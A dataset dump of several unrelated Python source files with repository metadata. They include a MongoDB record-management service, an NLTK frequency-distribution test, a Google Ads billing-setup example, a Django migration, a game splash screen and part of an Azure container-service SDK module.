            self, data_model: Type[ModelType], fields=[], query={}, sort=[], limit=0, skip=0,
            merge_field="", row_action="", parent="", additional_key=[], remove_keys=[], use_aggregate=False):
        """Search records and return them as UI-ready data dicts."""
        if fields:
            fields = fields + default_list_metadata
        list_data = await self.search_base(
            data_model, query=query, parent=parent, sort=sort, limit=limit, skip=skip,
            use_aggregate=use_aggregate
        )
        return get_data_list(
            list_data, fields=fields, merge_field=merge_field,
            row_action=row_action, additional_key=additional_key, remove_keys=remove_keys)
    async def search_export(
            self, data_model: Type[ModelType], fields=[], query={}, sort=[], limit=0, skip=0,
            merge_field="", data_mode="raw", parent="", additional_key=[], remove_keys=[],
            use_aggregate=False):
        """Search variant for exports (uses export metadata fields)."""
        if fields:
            fields = fields + export_list_metadata
        list_data = await self.search_base(
            data_model, query=query, parent=parent, sort=sort, limit=limit, skip=skip,
            use_aggregate=use_aggregate
        )
        return get_data_list(
            list_data, fields=fields, merge_field=merge_field,
            remove_keys=remove_keys, additional_key=additional_key)
    async def make_action_task_for_model(
            self, session, model_name, component_schema, act_config={}):
        """Clone the model's "save" action into a task action per act_config."""
        logger.info(f" make_default_action_model {model_name}")
        ASCENDING = 1
        """Ascending sort order."""
        DESCENDING = -1
        """Descending sort order."""
        sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
        q = {"$and": [
            {"model": model_name},
            {"deleted": 0},
            {"action_type": "save"},
            {"list_query": "{}"}]}
        action_model = await self.gen_model("action")
        model = await self.gen_model(model_name)
        list_data = await search_by_filter(
            action_model, q, sort=sort, limit=0, skip=0
        )
        if list_data:
            # Use the first matching "save" action as the template.
            src_action = list_data[0]
            src = src_action.dict().copy()
            action = action_model(**src)
            action.sys = component_schema.sys
            action.model = model_name
            action.list_order = await self.count_by_filter(
                model, query={"deleted": 0})
            action.data_value['model'] = component_schema.title
            action.admin = act_config.get("admin", False)
            if not action.admin:
                action.user_function = "user"
            if action.component_type:
                action.component_type = component_schema.type
            action.action_type = act_config.get("action_type", "task")
            action.data_value['action_type'] = act_config.get("action_type")
            action.type = act_config.get("type", "data")
            action.title = f"Task {component_schema.title}"
            action.data_value['title'] = f"Task {component_schema.title}"
            action.rec_name = f"{model_name}_{act_config.get('rec_name')}"
            action.data_value['rec_name'] = action.rec_name
            await self.save_object(session, action, model_name="action", model=action_model)
    async def make_default_action_model(
            self, session: Session, model_name: str, component_schema: BasicModel, menu_group=False):
        """
        :param session: current session Object
        :param model_name: name of model
        :param component_schema: name of component
        :param menu_group: dict with 2 entries "rec_name" and "title"
        :return: None
        """
        logger.info(f" make_default_action_model {model_name}")
        ASCENDING = 1
        """Ascending sort order."""
        DESCENDING = -1
        """Descending sort order."""
        sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
        # Template actions: system-level actions with an empty list_query.
        q = {"$and": [
            {"model": "action"},
            {"sys": True},
            {"deleted": 0},
            {"list_query": "{}"}]}
        action_model = await self.gen_model("action")
        menu_group_model = await self.gen_model("menu_group")
        model = await self.gen_model(model_name)
        list_data = await search_by_filter(
            action_model, q, sort=sort, limit=0, skip=0
        )
        list_actions_todo = get_data_list(list_data)
        logger.info(f"found {len(list_actions_todo)} action {component_schema.sys}")
        group_created = False
        menu_groups = await self.count_by_filter(
            menu_group_model, query={"rec_name": model_name, "deleted": 0})
        # Create a menu group for the model unless one exists already or the
        # component is a resource (resources share a common group below).
        if (
                menu_groups == 0 and not component_schema.type == 'resource'
        ):
            if component_schema.sys:
                menu = menu_group_model(
                    **{
                        "rec_name": model_name,
                        "label": component_schema.title,
                        "admin": component_schema.sys,
                    })
            else:
                menu = menu_group_model(
                    **{
                        "rec_name": model_name,
                        "label": component_schema.title,
                        "admin": component_schema.sys,
                        "app_code": [self.app_code]
                    })
            group_created = True
            await self.save_object(session, menu, model_name="menu_group", model=menu_group_model)
        # Clone every template action for the new model.
        for action_tmp in list_actions_todo:
            data = action_tmp.copy()
            if data.get("id"):
                data.pop("id")
            if data.get("_id"):
                data.pop("_id")
            action = action_model(**data)
            action.sys = component_schema.sys
            action.model = model_name
            action.list_order = await self.count_by_filter(model, query={"deleted": 0})
            action.data_value['model'] = component_schema.title
            action.admin = component_schema.sys
            if not action.admin:
                action.user_function = "user"
            if action.component_type:
                action.component_type = component_schema.type
            if action.action_type == "menu":
                action.title = f"{component_schema.title}"
                action.data_value['title'] = f"{component_schema.title}"
                action.data_value['data_model'] = model_name
                if menu_group:
                    action.menu_group = menu_group['rec_name']
                    action.data_value['menu_group'] = menu_group['title']
                else:
                    if component_schema.type == 'resource':
                        action.menu_group = 'risorse_app'
                        action.data_value['menu_group'] = "Risorse Apps"
                    else:
                        action.menu_group = model_name
                        action.data_value['menu_group'] = component_schema.title
            # Rename template rec_names from *_action to *_<model_name>.
            action.rec_name = action.rec_name.replace("_action", f"_{model_name}")
            action.data_value['rec_name'] = action.rec_name
            action.next_action_name = action.next_action_name.replace("_action", f"_{model_name}")
            await self.save_object(session, action, model_name="action", model=action_model)
    async def save_record(self, schema, remove_meta=True):
        """Persist a single record (thin wrapper over mongo_core)."""
        await save_record(schema, remove_meta=remove_meta)
    async def save_all(self, schema, remove_meta=True):
        """Persist a batch of records (thin wrapper over mongo_core)."""
        return await save_all(schema, remove_meta=remove_meta)
    async def set_user_data(self, record):
        """Stamp ownership fields from the current session user onto record."""
        record.owner_uid = self.session.user.get('uid')
        record.owner_name = self.session.user.get('full_name', "")
        record.owner_mail = self.session.user.get('mail', "")
        record.owner_sector = self.session.sector
        record.owner_sector_id = self.session.sector_id
        record.owner_personal_type = self.session.user.get("tipo_personale", "")
        record.owner_job_title = self.session.user.get("qualifica", "")
        record.owner_function = self.session.function
        return record
    def get_password_hash(self, password):
        """Hash a clear-text password with the configured passlib context."""
        return self.pwd_context.hash(password)
    def diff(self, li1, li2):
        """Symmetric difference of two lists (items in exactly one of them)."""
        li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2]
        return li_dif
    async def get_record_diff(self, session, object_o, rec_name: str = "", model_name="", copy=False):
        """Return the dict of fields that differ from the stored record.

        With no stored source (new record or copy), the full cleaned dict of
        `object_o` is returned instead.
        """
        logger.info(f"model:{model_name}, rec_name: {rec_name}, copy: {copy}")
        # if not model:
        #     model = await self.gen_model(model_name)
        to_pop = default_list_metadata_fields[:]
        if rec_name:
            source = await self.by_name(type(object_o), rec_name)
            if not copy:
                if object_o.rec_name == rec_name:
                    to_pop.append("rec_name")
                object_o = update_model(source, object_o, pop_form_newobject=to_pop)
        new_dict = object_o.get_dict()
        [new_dict.pop(key) for key in to_pop]
        if rec_name and source:
            src_base = source.dict().copy()
            [src_base.pop(key) for key in to_pop]
            src_dict = src_base.copy()
            set_src_l = list(src_dict.items())
            set_new_l = list(new_dict.items())
            dict_diff = dict(self.diff(set_src_l, set_new_l))
        else:
            dict_diff = new_dict.copy()
        return dict_diff.copy()
    async def save_object(
            self, session, object_o, rec_name: str = "", model_name="",
            copy=False, model=False, create_add_user=True) -> Any:
        """Create, update or copy a record, handling metadata and errors.

        Existing records (matched by rec_name) are merged and stamped with
        update metadata; new records and copies get creation metadata, a
        list_order, and owner data. Duplicate-key and validation errors are
        returned as {"status": "error", ...} dicts instead of raising.
        """
        logger.debug(f" model:{model_name}, rec_name: {rec_name}, copy: {copy}")
        if not model and model_name:
            model = await self.gen_model(model_name)
        if not model and not model_name:
            model = await self.gen_model(type(object_o).str_name())
        source = await self.by_name(model, object_o.rec_name)
        if source:
            rec_name = object_o.rec_name
        if rec_name:
            if not source:
                source = await self.by_name(model, rec_name)
            if not copy:
                to_pop = default_fields[:]
                object_o = update_model(source, object_o, pop_form_newobject=to_pop)
            if session.user:
                object_o.update_uid = session.user.get('uid')
            object_o.update_datetime = datetime.now()
        if not rec_name or copy:
            object_o.list_order = await self.count_by_filter(model, query={"deleted": 0})
            object_o.data_value['list_order'] = object_o.list_order
            object_o.create_datetime = datetime.now()
            if create_add_user:
                object_o = await self.set_user_data(object_o)
            if model_name == "user":
                # Never store the clear-text password.
                pw_hash = self.get_password_hash(object_o.password)
                object_o.password = pw_hash
            if copy:
                if hasattr(object_o, "title"):
                    object_o.title = f"{object_o.title} Copy()"
                if (
                        hasattr(object_o, "rec_name") and
                        object_o.rec_name and model_name not in object_o.rec_name
                ):
                    object_o.rec_name = f"{object_o.rec_name}_copy"
                if hasattr(object_o, "data_value"):
                    object_o.data_value['rec_name'] = object_o.rec_name
            else:
                object_o.rec_name = f"{model_name}.{object_o.id}"
        try:
            rec = await save_record(object_o)
        except pymongo.errors.DuplicateKeyError as e:
            logger.error(f" Duplicate {e.details['errmsg']}")
            field = e.details['keyValue']
            key = list(field.keys())[0]
            val = field[key]
            return {
                "status": "error",
                "message": f"Errore Duplicato {key}: {val}",
                "model": model_name
            }
        except pydantic.error_wrappers.ValidationError as e:
            logger.error(f" Validation {e}")
            return {
                "status": "error",
                "message": f"Errore validazione {e}",
                "model": model_name
            }
        return rec
    async def set_to_delete_record(self, data_model: Type[ModelType], record):
        """Soft-delete a single record (marks it for later cleanup)."""
        logger.info(f" data_model: {data_model}, record: {record.rec_name}")
        return await set_to_delete_record(data_model, record)
    async def set_to_delete_records(self, data_model: Type[ModelType], query={}):
        """Soft-delete every record matching `query`."""
        logger.info(f" data_model: {data_model}, query: {query}")
        return await set_to_delete_records(data_model, query=query)
    async def clean_action_and_menu_group(self, model_name_to_clean):
        """Hard-delete the actions and menu group generated for a model."""
        menu_group_model = await self.gen_model("menu_group")
        action_model = await self.gen_model("action")
        await self.delete_records(action_model, query={"$and": [{"model": model_name_to_clean}]})
        await self.delete_records(menu_group_model, query={"$and": [{"rec_name": model_name_to_clean}]})
    async def delete_records(self, data_model, query={}):
        """Hard-delete records matching `query` (no-op when none match)."""
        logger.info(f" delete_records data_model: {data_model}, query: {query}")
        cont = await self.count_by_filter(data_model, query)
        if cont > 0:
            return await delete_records(data_model, query=query)
        return True
    async def get_collections_names(self, query={}):
        """List collection names in the database."""
        collections_names = await get_collections_names(query=query)
        return collections_names
    async def clean_expired_to_delete_record(self):
        """Purge soft-deleted records (and expired sessions) everywhere."""
        logger.info(f" clean expired to delete record ")
        c_names = await self.get_collections_names()
        for name in c_names:
            data_model = await self.gen_model(name)
            logger.info(f" clean {name} ")
            if data_model:
                if name == "session":
                    res = await clean_session(datetime.now().isoformat())
                    logger.info(f" clean to delete {name} {res}")
                else:
                    res = await erese_all_to_delete_record(data_model)
                    logger.info(f" clean to delete {name} {res}")
        return {"status": "done"}
    def check_parse_json(self, str_test):
        """Parse a JSON string, retrying with '->" fix; False on failure."""
        try:
            str_test = ujson.loads(str_test)
        except ValueError as e:
            # Tolerate single-quoted pseudo-JSON coming from the UI.
            str_test = str_test.replace("'", "\"")
            try:
                str_test = ujson.loads(str_test)
            except ValueError as e:
                return False
        return str_test
    async def create_view(self, dbviewcfg: DbViewModel):
        """Create a database view from its configuration record."""
        return await create_view(dbviewcfg)
    async def search_view(
            self, model_view: str, query: dict = {}, sort=[], limit=0, skip=0) -> List[Dict]:
        """Search a database view by name and return plain data dicts.
        """
        ASCENDING = 1
        """Ascending sort order."""
        DESCENDING = -1
        """Descending sort order."""
        if not sort:
            #
            sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
        list_data = await raw_search_by_filter(
            model_view, query, sort=sort, limit=limit, skip=skip
        )
        return get_data_list(list_data)
| 40.085965 | 120 | 0.59403 |
ace95421dcca1ded7e403f7f9b5db7d0276e983f | 210 | py | Python | .venv/lib/python3.10/site-packages/nltk/test/unit/test_freqdist.py | plocandido/docinfrati | ad563c93efed1d6909a7650d299cac9adf8a1348 | [
"MIT"
] | null | null | null | .venv/lib/python3.10/site-packages/nltk/test/unit/test_freqdist.py | plocandido/docinfrati | ad563c93efed1d6909a7650d299cac9adf8a1348 | [
"MIT"
] | null | null | null | .venv/lib/python3.10/site-packages/nltk/test/unit/test_freqdist.py | plocandido/docinfrati | ad563c93efed1d6909a7650d299cac9adf8a1348 | [
"MIT"
] | null | null | null | import nltk
def test_iterating_returns_an_iterator_ordered_by_frequency():
samples = ["one", "two", "two"]
distribution = nltk.FreqDist(samples)
assert list(distribution) == ["two", "one"]
| 26.25 | 63 | 0.680952 |
ace954a02bc3dd64a3db5a55338fc3325274ec96 | 400 | py | Python | bin/api_connector_splunk/splunklib/modularinput/__init__.py | CyberGRX/api-connector-splunk | 7f1db1cecb7ae367c1882c3188dc9f8bcb6bc4c6 | [
"MIT"
] | 495 | 2015-01-18T01:51:24.000Z | 2022-03-30T21:41:25.000Z | bin/api_connector_splunk/splunklib/modularinput/__init__.py | CyberGRX/api-connector-splunk | 7f1db1cecb7ae367c1882c3188dc9f8bcb6bc4c6 | [
"MIT"
] | 611 | 2020-11-04T21:35:28.000Z | 2022-03-31T14:06:08.000Z | bin/api_connector_splunk/splunklib/modularinput/__init__.py | CyberGRX/api-connector-splunk | 7f1db1cecb7ae367c1882c3188dc9f8bcb6bc4c6 | [
"MIT"
] | 367 | 2015-01-06T05:30:16.000Z | 2022-03-30T21:48:29.000Z | """The following imports allow these classes to be imported via
the splunklib.modularinput package like so:
from splunklib.modularinput import *
"""
from .argument import Argument
from .event import Event
from .event_writer import EventWriter
from .input_definition import InputDefinition
from .scheme import Scheme
from .script import Script
from .validation_definition import ValidationDefinition
| 30.769231 | 63 | 0.835 |
ace9581fce3da511b01b7bd3617494eaac4d6886 | 10,346 | py | Python | examples/billing/add_billing_setup.py | pandemonium0225/google-ads-python | 46ec5e253c949d97822a1446018718f29f10e2d7 | [
"Apache-2.0"
] | null | null | null | examples/billing/add_billing_setup.py | pandemonium0225/google-ads-python | 46ec5e253c949d97822a1446018718f29f10e2d7 | [
"Apache-2.0"
] | null | null | null | examples/billing/add_billing_setup.py | pandemonium0225/google-ads-python | 46ec5e253c949d97822a1446018718f29f10e2d7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example creates a billing setup for a customer.
A billing setup is a link between a payments account and a customer. The new
billing setup can either reuse an existing payments account, or create a new
payments account with a given payments profile. Billing setups are applicable
for clients on monthly invoicing only. See here for details about applying for
monthly invoicing: https://support.google.com/google-ads/answer/2375377.
In the case of consolidated billing, a payments account is linked to the
manager account and is linked to a customer account via a billing setup.
"""
import argparse
from datetime import datetime, timedelta
import sys
from uuid import uuid4
from google.ads.googleads.client import GoogleAdsClient
from google.ads.googleads.errors import GoogleAdsException
def main(
    client, customer_id, payments_account_id=None, payments_profile_id=None
):
    """Create and submit a new billing setup for the given customer.

    Builds a BillingSetup (reusing an existing payments account when
    ``payments_account_id`` is given, otherwise creating a new payments
    account from ``payments_profile_id``), fills in its start/end date
    times, and sends the mutate request to the API.

    Args:
        client: an initialized GoogleAdsClient instance.
        customer_id: a client customer ID.
        payments_account_id: payments account ID to attach to the new billing
            setup. If provided it must be formatted as "1234-5678-9012-3456".
        payments_profile_id: payments profile ID to attach to a new payments
            account and to the new billing setup. If provided it must be
            formatted as "1234-5678-9012".
    """
    # Assemble the billing setup payload and schedule its date range.
    new_setup = _create_billing_setup(
        client, customer_id, payments_account_id, payments_profile_id
    )
    _set_billing_setup_date_times(client, customer_id, new_setup)

    # Wrap the payload in a create operation and submit it.
    operation = client.get_type("BillingSetupOperation")
    client.copy_from(operation.create, new_setup)
    service = client.get_service("BillingSetupService")
    mutate_response = service.mutate_billing_setup(
        customer_id=customer_id, operation=operation
    )
    print(
        "Added new billing setup with resource name "
        f"{mutate_response.result.resource_name}"
    )
def _create_billing_setup(
    client, customer_id, payments_account_id=None, payments_profile_id=None
):
    """Creates and returns a new billing setup instance.

    The new billing setup will have its payment details populated. One of the
    payments_account_id or payments_profile_id must be provided.

    Args:
        client: an initialized GoogleAdsClient instance.
        customer_id: a client customer ID.
        payments_account_id: payments account ID to attach to the new billing
            setup. If provided it must be formatted as "1234-5678-9012-3456".
        payments_profile_id: payments profile ID to attach to a new payments
            account and to the new billing setup. If provided it must be
            formatted as "1234-5678-9012".

    Returns:
        A newly created BillingSetup instance.
    """
    billing_setup = client.get_type("BillingSetup")

    # Sets the appropriate payments account field.
    # PEP 8: compare against None with identity (`is not None`), not `!=`.
    if payments_account_id is not None:
        # If a payments account ID has been provided, set the payments_account
        # field to the full resource name of the given payments account ID.
        # You can list available payments accounts via the
        # PaymentsAccountService's ListPaymentsAccounts method.
        billing_setup.payments_account = client.get_service(
            "BillingSetupService"
        ).payments_account_path(customer_id, payments_account_id)
    elif payments_profile_id is not None:
        # Otherwise, create a new payments account by setting the
        # payments_account_info field.
        # See https://support.google.com/google-ads/answer/7268503
        # for more information about payments profiles.
        billing_setup.payments_account_info.payments_account_name = (
            f"Payments Account #{uuid4()}"
        )
        billing_setup.payments_account_info.payments_profile_id = (
            payments_profile_id
        )

    return billing_setup
def _set_billing_setup_date_times(client, customer_id, billing_setup):
    """Populate the start and end date times on a new billing setup.

    Queries the customer's account for approved billing setups. When one
    exists, the new setup starts one day after the latest one ends (failing
    if that setup runs indefinitely); otherwise it starts immediately. The
    end is always one day after the start.

    Args:
        client: an initialized GoogleAdsClient instance.
        customer_id: a client customer ID.
        billing_setup: the billing setup whose starting and ending date times
            will be set.
    """
    # The query to search existing approved billing setups in the end date time
    # descending order. See get_billing_setup.py for a more detailed example of
    # how to retrieve billing setups.
    query = """
        SELECT
          billing_setup.end_date_time
        FROM billing_setup
        WHERE billing_setup.status = APPROVED
        ORDER BY billing_setup.end_date_time DESC
        LIMIT 1"""

    ga_service = client.get_service("GoogleAdsService")
    stream = ga_service.search_stream(customer_id=customer_id, query=query)
    # Fully consume the stream so the single (latest) row is accessible.
    batches = list(stream)

    if not batches:
        # With no approved billing setups, the only acceptable start date
        # time is now.
        new_start = datetime.now()
    else:
        latest_end = batches[0].results[0].billing_setup.end_date_time

        if not latest_end:
            # A null ending date time means the current billing setup runs
            # indefinitely; billing setups cannot overlap, so fail fast.
            raise Exception(
                "Cannot set starting and ending date times for the new billing "
                "setup; the latest existing billing setup is set to run "
                "indefinitely."
            )

        # end_date_time may be a bare date (%Y-%m-%d) or include a time
        # component (%Y-%m-%d %H:%M:%S); try the bare-date form first.
        try:
            parsed_end = datetime.strptime(latest_end, "%Y-%m-%d")
        except ValueError:
            parsed_end = datetime.strptime(latest_end, "%Y-%m-%d %H:%M:%S")

        # The new billing setup starts one day after the last one ends.
        new_start = parsed_end + timedelta(days=1)

    billing_setup.start_date_time = new_start.strftime("%Y-%m-%d %H:%M:%S")
    billing_setup.end_date_time = (new_start + timedelta(days=1)).strftime(
        "%Y-%m-%d %H:%M:%S"
    )
if __name__ == "__main__":
    # GoogleAdsClient will read the google-ads.yaml configuration file in the
    # home directory if none is specified.
    googleads_client = GoogleAdsClient.load_from_storage(version="v10")

    parser = argparse.ArgumentParser(
        description=("Creates a billing setup for a given customer.")
    )
    # The following argument(s) should be provided to run the example.
    parser.add_argument(
        "-c",
        "--customer_id",
        type=str,
        required=True,
        help="The Google Ads customer ID.",
    )
    # Creates a mutually exclusive argument group to ensure that only one of the
    # following two arguments are given, otherwise it will raise an error.
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        "-a",
        "--payments_account_id",
        type=str,
        help="Either a payments account ID or a payments profile ID must be "
        "provided for the example to run successfully. "
        "See: https://developers.google.com/google-ads/api/docs/billing/billing-setups#creating_new_billing_setups. "
        "Provide an existing payments account ID to link to the new "
        "billing setup. Must be formatted as '1234-5678-9012-3456'.",
    )
    group.add_argument(
        "-p",
        "--payments_profile_id",
        type=str,
        help="Either a payments account ID or a payments profile ID must be "
        "provided for the example to run successfully. "
        "See: https://developers.google.com/google-ads/api/docs/billing/billing-setups#creating_new_billing_setups. "
        "Provide an existing payments profile ID to link to a new payments "
        "account and the new billing setup. Must be formatted as: "
        "'1234-5678-9012-3456'.",
    )
    args = parser.parse_args()

    # Run the example; the unset member of the mutually exclusive group is
    # None, and main() picks whichever was supplied.
    try:
        main(
            googleads_client,
            args.customer_id,
            args.payments_account_id,
            args.payments_profile_id,
        )
    except GoogleAdsException as ex:
        # Surface API failures with their request ID and per-error details,
        # then exit non-zero so shell callers can detect the failure.
        print(
            f'Request with ID "{ex.request_id}" failed with status '
            f'"{ex.error.code().name}" and includes the following errors:'
        )
        for error in ex.failure.errors:
            print(f'\tError with message "{error.message}".')
            if error.location:
                for field_path_element in error.location.field_path_elements:
                    print(f"\t\tOn field: {field_path_element.field_name}")
        sys.exit(1)
ace95925b02ca6e79bc2808102df4574a00a7eb0 | 565 | py | Python | ToDo/migrations/0003_auto_20200608_1458.py | chumbajr/todoapp | eeccfb1c40d2b7111d0d96c60315e2b16ea86984 | [
"MIT"
] | 1 | 2020-07-13T08:57:52.000Z | 2020-07-13T08:57:52.000Z | ToDo/migrations/0003_auto_20200608_1458.py | chumbajr/todoapp | eeccfb1c40d2b7111d0d96c60315e2b16ea86984 | [
"MIT"
] | 8 | 2021-03-30T14:05:23.000Z | 2022-01-13T03:00:33.000Z | ToDo/migrations/0003_auto_20200608_1458.py | chumbajr/todoapp | eeccfb1c40d2b7111d0d96c60315e2b16ea86984 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.7 on 2020-06-08 14:58
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('ToDo', '0002_auto_20200606_0929'),
]
operations = [
migrations.AlterModelOptions(
name='todo',
options={'get_latest_by': 'start_time'},
),
migrations.AlterField(
model_name='todo',
name='start_time',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
| 23.541667 | 74 | 0.60354 |
ace95994b62bc5ad7af7c4c79d4f181cd38e8251 | 2,359 | py | Python | src/world/logosplashworld.py | alisonbento/steering-all | 99797f99180dd64189ea5ed85ff71b66bfd9cf6f | [
"MIT"
] | 3 | 2016-10-10T18:34:55.000Z | 2017-08-02T15:18:28.000Z | src/world/logosplashworld.py | alisonbento/steering-all | 99797f99180dd64189ea5ed85ff71b66bfd9cf6f | [
"MIT"
] | null | null | null | src/world/logosplashworld.py | alisonbento/steering-all | 99797f99180dd64189ea5ed85ff71b66bfd9cf6f | [
"MIT"
] | null | null | null | import dotworld
import ufrnsplashworld
from src.define import *
from src.dot.entities.dotpairg import DotPairg
from src.dot.dottext import DotText
import i18n
_ = i18n.language.ugettext
class LogoSplashWorld(dotworld.DotWorld):
    """Splash-screen world that fades the PAIRG logo in, holds it, fades it
    out, then hands control to the UFRN splash world.

    Animation states: 1 = fading in, 2 = holding at full alpha, 3 = fading
    out. When the world is deactivated (pause), the next step() switches the
    screen to UfrnSplashWorld.
    """

    def __init__(self):
        dotworld.DotWorld.__init__(self)
        # Frame counter used for the hold phase of the animation.
        self.counter = 0
        # NOTE(review): `limit` appears unused in this class — possibly a
        # leftover; confirm before removing.
        self.limit = 400
        # Current alpha (0-255) applied to the logo and both labels.
        self.alpha = 0
        # 1 = fade in, 2 = hold, 3 = fade out.
        self.animState = 1
        self.logo = DotPairg()
        self.label = DotText("PAIRG - Physical Artifacts of Interaction Research Group", 16, (0, 0, 0), (255, 255, 255))
        self.sublabel = DotText(_("Developed by") + " Alison Bento", 16, (0, 0, 0), (255, 255, 255))

    def onAttachScreen(self):
        # Center the logo on screen and stack the two labels beneath it.
        self.logo.setMedium()
        self.logo.centerX(self.screen.width)
        self.logo.centerY(self.screen.height)
        self.logo.createSurface()
        self.label.centerX(self.screen.width)
        self.label.marginTop(dotget(1))
        self.label.below(self.logo)
        self.sublabel.centerX(self.screen.width)
        self.sublabel.marginTop(dotget(1))
        self.sublabel.below(self.label)

    def changeAlpha(self):
        # Propagate the current alpha value to every drawn element.
        self.logo.setDotAlpha(self.alpha)
        # self.logo.createSurface()
        self.label.surface.set_alpha(self.alpha)
        self.sublabel.surface.set_alpha(self.alpha)

    def listen(self, inputResult):
        # EXIT closes the application; BOOST skips the splash immediately.
        if inputResult == GameDefine.COMMAND_EXIT:
            self.screen.turnOff()

        if inputResult == GameDefine.COMMAND_BOOST:
            self.pause()

    def step(self):
        if self.active:
            self.changeAlpha()
            self.logo.draw(self.screen.displaysurf)
            self.label.draw(self.screen.displaysurf)
            self.sublabel.draw(self.screen.displaysurf)
            self.counter += 1

            if self.animState == 1:
                # Fade in; on reaching full alpha, enter the hold phase.
                self.alpha += 2
                if self.alpha > 255:
                    self.animState = 2
                    self.counter = 0

            if self.animState == 2:
                # Hold the logo visible. NOTE(review): counter is also
                # incremented unconditionally above, so it advances by 2 per
                # frame here — the hold lasts ~1.5s, not 3s; confirm intent.
                self.counter += 1
                if self.counter > self.screen.fps * 3:
                    self.animState = 3

            if self.animState == 3:
                # Fade out; when fully transparent, deactivate this world.
                self.alpha -= 2
                if self.alpha <= 0:
                    self.pause()
        else:
            # Once paused, hand the screen over to the next splash world.
            self.screen.setWorld(ufrnsplashworld.UfrnSplashWorld())
            del self
ace95a0e20a3f35f4602847566bef5410ece9fdc | 54,887 | py | Python | sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_04_01/aio/operations/_managed_clusters_operations.py | kazrael2119/azure-sdk-for-python | 485dd7b1b5ac41c1a5b9991e402b4035b55f437a | [
"MIT"
] | 1 | 2022-03-09T08:59:13.000Z | 2022-03-09T08:59:13.000Z | sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_04_01/aio/operations/_managed_clusters_operations.py | kazrael2119/azure-sdk-for-python | 485dd7b1b5ac41c1a5b9991e402b4035b55f437a | [
"MIT"
] | null | null | null | sdk/containerservice/azure-mgmt-containerservice/azure/mgmt/containerservice/v2020_04_01/aio/operations/_managed_clusters_operations.py | kazrael2119/azure-sdk-for-python | 485dd7b1b5ac41c1a5b9991e402b4035b55f437a | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._managed_clusters_operations import build_create_or_update_request_initial, build_delete_request_initial, build_get_access_profile_request, build_get_request, build_get_upgrade_profile_request, build_list_by_resource_group_request, build_list_cluster_admin_credentials_request, build_list_cluster_monitoring_user_credentials_request, build_list_cluster_user_credentials_request, build_list_request, build_reset_aad_profile_request_initial, build_reset_service_principal_profile_request_initial, build_rotate_cluster_certificates_request_initial, build_update_tags_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ManagedClustersOperations:
"""ManagedClustersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.containerservice.v2020_04_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
    @distributed_trace
    def list(
        self,
        **kwargs: Any
    ) -> AsyncIterable["_models.ManagedClusterListResult"]:
        """Gets a list of managed clusters in the specified subscription.

        Gets a list of managed clusters in the specified subscription. The operation returns properties
        of each managed cluster. Pages are fetched lazily as the returned
        iterator is consumed.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ManagedClusterListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedClusterListResult"]
        # Map well-known HTTP error codes to exceptions; callers may extend
        # this via the ``error_map`` keyword argument.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the operation's template URL; subsequent pages
            # re-issue a GET against the service-provided next_link.
            if not next_link:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    template_url=self.list.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_request(
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page and return (next_link, items) for paging.
            deserialized = self._deserialize("ManagedClusterListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
